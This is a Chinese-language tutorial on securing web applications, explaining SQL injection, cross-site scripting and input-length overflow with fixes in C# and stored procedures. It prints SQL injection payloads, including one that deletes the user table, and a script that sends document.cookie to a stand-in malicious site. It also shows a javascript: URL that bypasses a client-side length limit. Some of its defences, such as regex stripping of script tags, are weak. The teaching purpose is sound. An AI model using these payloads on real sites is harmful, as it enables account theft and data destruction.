编写安全的Web2.0应用
开发人员可以运用诸多基本原则来增强web应用程序的安全性。主要有以下三条原则:
尽量减小权限
对访问资源的账户进行配置时,始终要把这些账户的权限限制在需要的最小权限。
千万不要相信用户的输入,验证任何输入的内容
这对web应用程序来说尤为重要。确保应用程序并不依赖客户端的验证。在服务器上应当重复所有的检查工作,因为要是没有约束条件,比较容易构建网页副本,有可能导致破坏性代码在运行,或者导致引起系统崩溃的拒绝服务(dos)攻击。
有节制地使用错误消息
虽然在开发程序时,详细的错误消息很有帮助,但它们对恶意用户来说同样是宝贵的信息来源。所以指定函数名这类细节没有太大的意义。这样的细节记录在另一个日志中比较好。
下面几个示例介绍了没有经过验证的用户输入如何被坏人利用的具体情况,并且介绍了避免这些问题的建议。
sql注入
如果允许任意的sql命令执行,就会出现sql注入(sql injection)。当sql语句在代码里面动态构建时,通常会出现这种情况。
以下面用c#编写的代码为例,该代码试图检查用户名/密码组合是否正确:
string username = txtusername.text;
string password = txtpassword.text;
string sql = "select * from tblusers
where username = '"+ username +"'
and password = '"+ password + "';";
//执行sql
用户名和密码从服务器端的两个文本框获取,并且sql语句被创建,然后该语句执行。如果没有记录返回,那么表明用户输入的详细资料不正确,或者没有经过注册; 否则用户可以进入到下一个阶段。
如果用户在两个文本框里面输入了joe和mypassword,那么sql语句会是:
select * from tblusers
where username = 'joe'
and password = 'mypassword';
这正是开发人员的意图。不过要是用户往密码文本框里面输入: ' or 'a' = 'a,sql就会是:
select * from tblusers
where username = 'joe'
and password = ''
or 'a' = 'a';
现在,密码不重要了,因为'a'='a'总是正确的。如果用来连接到数据库的账户有权删除数据而不是仅仅有权读取数据,就会出现更糟糕的情形。假设用户往密码文本框里面输入: '; delete from tblusers where 'a' = 'a'。这会得出以下的语句:
select * from tblusers
where username = 'joe'
and password = '';
delete from tblusers
where 'a' = 'a';
现在,整个用户表就会被清空。防止这类问题主要有两种办法。一是,可以使用存储过程(stored procedure)来执行用户验证步骤。设置参数值时,避免使用单引号等特殊符号,因而不可能为where语句添加额外的断言(predicate),也不会运行多个sql语句。譬如说,可以构建像下面这样的存储过程,接受两个输入参数后,返回表明用户是不是合法用户的第三个参数:
create procedure spcheckuser
(
@username varchar(20),
@password varchar(20),
@isvalid bit output
)
as
declare @usercount int
select @usercount = count(*)
from tblusers
where username = @username
and password = @password
if @usercount = 1
set @isvalid = 1
else
set @isvalid = 0
现在,初始代码经改动后可以使用存储过程:
sqlcommand sqlcommand =
new sqlcommand("spcheckuser");
sqlparameter sqlparam =
new sqlparameter("@username",
sqldbtype.varchar, 20)
sqlparam.value = txtusername.text;
sqlparam.direction =
parameterdirection.input;
sqlcommand.parameters.add(sqlparam);
sqlparam =
new sqlparameter("@password",
sqldbtype.varchar, 20)
sqlparam.value = txtpassword.text;
sqlparam.direction =
parameterdirection.input;
sqlcommand.parameters.add(sqlparam);
sqlparam =
new sqlparameter("@isvalid",
sqldbtype.bit, 1)
sqlparam.direction =
parameterdirection.output;
sqlcommand.parameters.add(sqlparam);
//执行命令,并检索输出参数值输入和输出参数使用相关类型来说明。如今区别在于,基本的ado.net类会把字符串' or 'a' = 'a当成实际用户的密码来处理,而不是当成可执行sql来处理。
避免这种安全漏洞的第二种办法(也适用于所有的用户输入)就是,确保特殊字符或者字符串被禁用。对sql而言,导致问题的那个字符就是单引号,所以如果没法使用存储过程,那么就把所有单引号变成双引号,这可以防止有人构建额外的sql:
string username = txtusername.text;
string password = txtpassword.text;
username = username.replace("'","''");
password = password.replace("'","''");
string sql = "select *
from tblusers
where username = '"+ username +"'
and password = '"+ password +"';";
//执行sql
现在,构建的sql成为:
select *
from tblusers
where username = 'joe'
and password = '''
or ''a'' = ''a';
这意味着该用户没有被识别。
跨站脚本
跨站脚本(有时缩写成xss)允许来自一个地方的代码在另一个网站里面运行。正如在大多数情况下一样,只要验证用户输入的内容就可以避免这问题。以接受html格式的帖子的公告牌为例。假定用户在发布消息中加入了以下内容:
hello everyone
要是不对脚本块进行任何验证及删除,这条消息就会出现,标准的警告信息也会显示。假定这个示例没有恶意,再考虑下一个示例:
var i = new image();
i.src =
"http://www.malicioussite.com/save.asp"
+ escape(document.cookie);
现在,该用户的cookie会被传送到恶意网站,然后记录在网络日志里面。这不是原先需要的操作,可能会泄露私人信息,或者让不怀好意的人以合法用户的身份登录到公告牌。可以通过采用正则表达式来搜索及清除像< script>及其内容这些元素的办法来防止这个问题。
数据溢出
数据过多可能会带来问题,这有两个原因。一是,因为应用程序往往会崩溃,譬如说,如果程序试图把50个字符写入到列大小只有40个字符的数据库表,就会引起程序崩溃。显然,良好的错误捕获方法应当可以防止这一问题,但如果用户输入的是有效内容,而且来自可信用户,那么这个问题往往不会发生。数据过多轻则带来差劲的用户体验,重则导致严重消耗服务器资源,要是问题频频发生,还会导致整个服务无法使用。如果输入内容专门旨在导致错误、机器过载,这就叫拒绝服务(dos)攻击。
第二个问题是缓冲器溢出。有时候,输入的数据会溢出旨在存放它的内存区,而成为可执行代码的一部分。只要对输入到输入框中的数据进行精心设计,攻击者就可以在服务器上执行任意代码。
为了避免该问题,不要依靠客户端技术,譬如设置文本框的最大长度属性。这很容易被跳过。有些浏览器(包括ie在内)允许javascript url。如果网页的文本框有一个标为txtsurname的id,那么下列代码拷贝到浏览器的地址栏上后,就会改变最大长度属性:
javascript:document.getelementbyid
("txtsurname").maxlength = 1000
防止这个问题的方法仍然是在服务器上进行检查,看看输入内容是否超过所需长度; 必要的话缩减输入内容。
